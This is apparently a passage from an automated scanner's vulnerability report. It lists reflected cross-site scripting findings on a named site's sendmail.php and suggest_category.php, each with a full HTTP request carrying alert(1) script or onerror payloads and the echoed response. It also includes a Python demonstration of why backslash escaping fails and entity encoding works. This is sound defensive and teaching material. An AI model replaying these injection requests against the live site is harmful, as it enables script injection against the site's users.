GET /sendmail.php?u=anto/4a47c<img%20src%3da%20onerror%3dalert(1)>16d4794a3fiosi HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:00:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<b>anto/4a47c<img src=a onerror=alert(1)>16d4794a3fiosi</b>
...[SNIP]...

2.4147. http://www.resellerbase.com/sendmail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4d1aa<img%20src%3da%20onerror%3dalert(1)>fb5aafcbc8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d1aa<img src=a onerror=alert(1)>fb5aafcbc8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sendmail.php?u=a/4d1aa<img%20src%3da%20onerror%3dalert(1)>fb5aafcbc8bdmin HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:57:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<b>a/4d1aa<img src=a onerror=alert(1)>fb5aafcbc8bdmin</b>
...[SNIP]...

2.4148. http://www.resellerbase.com/sendmail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 26f26<script>alert(1)</script>f575119078b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendmail.ph/26f26<script>alert(1)</script>f575119078bp?u= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:57:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /sendmail.ph/26f26<script>alert(1)</script>f575119078bp?u= was not found on this server.</p>
...[SNIP]...

2.4149. http://www.resellerbase.com/sendmail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43f58"><img%20src%3da%20onerror%3dalert(1)>74f3887c0f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43f58\"><img src=a onerror=alert(1)>74f3887c0f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sendmail.php?u=a/43f58"><img%20src%3da%20onerror%3dalert(1)>74f3887c0f4dmin HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:57:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input type="hidden" name="u" value="a/43f58\"><img src=a onerror=alert(1)>74f3887c0f4dmin" />
...[SNIP]...

2.4150. http://www.resellerbase.com/sendmail.php [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The value of the name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c66a3"><img%20src%3da%20onerror%3dalert(1)>e9161388be461bf31 was submitted in the name parameter. This input was echoed as c66a3"><img src=a onerror=alert(1)>e9161388be461bf31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wienerc66a3"><img%20src%3da%20onerror%3dalert(1)>e9161388be461bf31&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input class="text3" type="text" name="name" size="40" value="Peter Wienerc66a3"><img src=a onerror=alert(1)>e9161388be461bf31" />
...[SNIP]...

2.4151. http://www.resellerbase.com/sendmail.php [revid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The value of the revid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1acee"><img%20src%3da%20onerror%3dalert(1)>3f72fe63afeda7777 was submitted in the revid parameter. This input was echoed as 1acee\"><img src=a onerror=alert(1)>3f72fe63afeda7777 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid=1acee"><img%20src%3da%20onerror%3dalert(1)>3f72fe63afeda7777 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:09:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input type="hidden" name="revid" value="1acee\"><img src=a onerror=alert(1)>3f72fe63afeda7777" />
...[SNIP]...

2.4152. http://www.resellerbase.com/sendmail.php [subject parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The value of the subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1307"><img%20src%3da%20onerror%3dalert(1)>c1e13ee67ecfdf898 was submitted in the subject parameter. This input was echoed as c1307"><img src=a onerror=alert(1)>c1e13ee67ecfdf898 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.comc1307"><img%20src%3da%20onerror%3dalert(1)>c1e13ee67ecfdf898&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input class="text3" type="text" name="subject" size="40" value="555-555-0199@example.comc1307"><img src=a onerror=alert(1)>c1e13ee67ecfdf898" />
...[SNIP]...

2.4153. http://www.resellerbase.com/sendmail.php [to parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The value of the to request parameter is copied into the HTML document as plain text between tags. The payload 120bd<img%20src%3da%20onerror%3dalert(1)>508c1d5827af744e was submitted in the to parameter. This input was echoed as 120bd<img src=a onerror=alert(1)>508c1d5827af744e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=120bd<img%20src%3da%20onerror%3dalert(1)>508c1d5827af744e&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<b>120bd<img src=a onerror=alert(1)>508c1d5827af744e</b>
...[SNIP]...

2.4154. http://www.resellerbase.com/sendmail.php [to parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The value of the to request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1a1a"><img%20src%3da%20onerror%3dalert(1)>234190cb646557666 was submitted in the to parameter. This input was echoed as c1a1a\"><img src=a onerror=alert(1)>234190cb646557666 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=c1a1a"><img%20src%3da%20onerror%3dalert(1)>234190cb646557666&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input type="hidden" name="to" value="c1a1a\"><img src=a onerror=alert(1)>234190cb646557666" />
...[SNIP]...

2.4155. http://www.resellerbase.com/sendmail.php [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload e9b68<img%20src%3da%20onerror%3dalert(1)>c2bea504c4f was submitted in the u parameter. This input was echoed as e9b68<img src=a onerror=alert(1)>c2bea504c4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sendmail.php?u=e9b68<img%20src%3da%20onerror%3dalert(1)>c2bea504c4f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<b>e9b68<img src=a onerror=alert(1)>c2bea504c4f</b>
...[SNIP]...

2.4156. http://www.resellerbase.com/sendmail.php [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload e2508<img%20src%3da%20onerror%3dalert(1)>f3e82f94621190868 was submitted in the u parameter. This input was echoed as e2508<img src=a onerror=alert(1)>f3e82f94621190868 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=&lid=&u=e2508<img%20src%3da%20onerror%3dalert(1)>f3e82f94621190868&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<b>e2508<img src=a onerror=alert(1)>f3e82f94621190868</b>
...[SNIP]...

2.4157. http://www.resellerbase.com/sendmail.php [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42af8"><img%20src%3da%20onerror%3dalert(1)>e3860e22eb8a0c4ff was submitted in the u parameter. This input was echoed as 42af8\"><img src=a onerror=alert(1)>e3860e22eb8a0c4ff in the application's response. Note the backslash that appears before the double quote in the echoed value: the application escapes quotes in the addslashes() style (consistent with PHP's magic_quotes_gpc, though the report cannot confirm which mechanism is responsible), but a backslash means nothing to an HTML parser, so the quote still terminates the attribute value and the injected <img> tag is parsed as markup. Backslash escaping is a SQL-string convention and is not a substitute for entity encoding (htmlspecialchars() with ENT_QUOTES) in an HTML attribute.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=&lid=&u=42af8"><img%20src%3da%20onerror%3dalert(1)>e3860e22eb8a0c4ff&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input type="hidden" name="u" value="42af8\"><img src=a onerror=alert(1)>e3860e22eb8a0c4ff" />
...[SNIP]...
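
The two sinks above (the <b> text node in 2.4156 and the double-quoted value attribute in 2.4157) fail for different reasons, and the attribute case shows the backslash-escaping trap. The following Python is added here as an illustration; it is not part of the scanner report and not code from resellerbase.com. It renders both sinks with an addslashes-style escaper standing in for whatever the application does (an assumption) and with HTML entity encoding, then feeds the result to Python's html.parser to see which start tags a tag-based parser actually recovers. ATTR_PAYLOAD and TEXT_PAYLOAD are the scanner's own payloads copied from the findings; everything else is constructed.

```python
import html
from html.parser import HTMLParser


def addslashes(value):
    """Stand-in for PHP's addslashes()/magic_quotes (an assumption about the app).

    Backslash-escapes quotes and backslashes. It is what turns the submitted
    42af8"><img ... into the echoed 42af8\\"><img ... seen in the response above:
    a SQL-string escape, not an HTML one.
    """
    return (value.replace("\\", "\\\\")
                 .replace('"', '\\"')
                 .replace("'", "\\'"))


def escape_for_html(value):
    """Entity-encode for both text and double-quoted attribute contexts
    (PHP equivalent: htmlspecialchars($v, ENT_QUOTES))."""
    return html.escape(value, quote=True)


def render_hidden_input(value, escaper):
    """The hidden <input name="u"> from the sendmail form (finding 2.4157)."""
    return '<input type="hidden" name="u" value="%s" />' % escaper(value)


def render_bold(value, escaper):
    """The <b>...</b> echo of u (finding 2.4156)."""
    return "<b>%s</b>" % escaper(value)


class _TagCollector(HTMLParser):
    """Record (tag, attrs) for every start tag, as a tag-based parser sees the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def event_handlers(markup):
    """(tag, attribute) for every on* attribute the parser recovers.

    Any hit means the input left its intended context and introduced
    script-bearing markup, which is what the alert(1) proof of concept needs.
    """
    return [(tag, name)
            for tag, attrs in parse_tags(markup)
            for name in attrs
            if name.startswith("on")]


# The scanner's own payloads, copied from the two findings above.
ATTR_PAYLOAD = '42af8"><img src=a onerror=alert(1)>e3860e22eb8a0c4ff'
TEXT_PAYLOAD = "e9b68<img src=a onerror=alert(1)>c2bea504c4f"


def demo():
    """Compare the two escapers in both contexts; keys name the case."""
    return {
        "attr_addslashes": event_handlers(render_hidden_input(ATTR_PAYLOAD, addslashes)),
        "attr_entities": event_handlers(render_hidden_input(ATTR_PAYLOAD, escape_for_html)),
        "text_none": event_handlers(render_bold(TEXT_PAYLOAD, lambda v: v)),
        "text_entities": event_handlers(render_bold(TEXT_PAYLOAD, escape_for_html)),
    }


if __name__ == "__main__":
    for case, handlers in demo().items():
        print("%-16s %s" % (case, handlers or "no event handler reachable"))
```

The parser's verdict is the point: with addslashes the rendered input still yields a second <img> start tag carrying onerror, because the quote closed the attribute before the backslash could matter; with escape_for_html the whole payload survives as the attribute's value and no extra tag exists. The same encoder covers the text-node sink, so one context-aware escaper at output time fixes both findings.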

2.4158. http://www.resellerbase.com/sendmail.php [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c391"><img%20src%3da%20onerror%3dalert(1)>6207c112f84 was submitted in the u parameter. This input was echoed as 7c391\"><img src=a onerror=alert(1)>6207c112f84 in the application's response. As in 2.4157, the backslash the application inserts before the quote is not an HTML escape and does not prevent the breakout: the quote still closes the attribute and the <img> tag that follows is parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sendmail.php?u=7c391"><img%20src%3da%20onerror%3dalert(1)>6207c112f84 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input type="hidden" name="u" value="7c391\"><img src=a onerror=alert(1)>6207c112f84" />
...[SNIP]...

2.4159. http://www.resellerbase.com/sendmail.php/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 80d82<script>alert(1)</script>0f163728eec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Two points are worth noting for this and the other REST URL parameter findings that follow. The reflection is in the application's own 404 page (the body is served as text/html with the application's X-Powered-By header), and a browser renders that body regardless of the 404 status, so the status code does not reduce the impact. Because the payload sits in the URL path rather than in a query parameter, confirm the behaviour in a browser before relying on the scanner's "Certain" rating: the scanner sent < and > on the wire literally, whereas browsers percent-encode them in the path, and whether the server decodes them before echoing depends on which request variable the 404 page prints.

Request

GET /sendmail.php80d82<script>alert(1)</script>0f163728eec/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:17:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /sendmail.php80d82<script>alert(1)</script>0f163728eec/ was not found on this server.</p>
...[SNIP]...

2.4160. http://www.resellerbase.com/suggest_category.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /suggest_category.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4b9ca<script>alert(1)</script>3eae090b4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /suggest_category.php4b9ca<script>alert(1)</script>3eae090b4c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /suggest_category.php4b9ca<script>alert(1)</script>3eae090b4c was not found on this server.</p>
...[SNIP]...

2.4161. http://www.resellerbase.com/suggest_category.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /suggest_category.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e990<script>alert(1)</script>4dbc159498276f492 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /suggest_category.php1e990<script>alert(1)</script>4dbc159498276f492?captcha_key=555-555-0199@example.com&pflag=send&parent=7&submit=Suggest+Category&cat_name=Peter+Wiener HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/suggest_category.php
